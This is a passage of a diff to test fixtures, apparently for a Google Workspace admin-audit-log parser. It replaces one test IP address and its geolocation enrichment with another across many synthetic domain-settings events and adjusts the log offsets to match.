+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3009,7 +2785,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3022,26 +2798,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 24181,
+        "log.offset": 24125,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3062,7 +2834,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -3074,26 +2846,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 24611,
+        "log.offset": 24554,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3114,7 +2882,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -3126,26 +2894,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 24997,
+        "log.offset": 24939,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3167,7 +2931,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3180,26 +2944,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 25391,
+        "log.offset": 25332,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3220,7 +2980,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3234,26 +2994,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 25810,
+        "log.offset": 25750,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3275,7 +3031,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3290,26 +3046,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 26266,
+        "log.offset": 26205,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3330,7 +3082,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3344,26 +3096,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 26758,
+        "log.offset": 26696,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3384,7 +3132,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3398,26 +3146,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 27216,
+        "log.offset": 27153,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3438,7 +3182,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3452,26 +3196,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 27674,
+        "log.offset": 27610,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3493,7 +3233,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3507,26 +3247,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 28139,
+        "log.offset": 28074,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3547,7 +3283,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3560,26 +3296,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 28610,
+        "log.offset": 28544,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3600,7 +3332,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
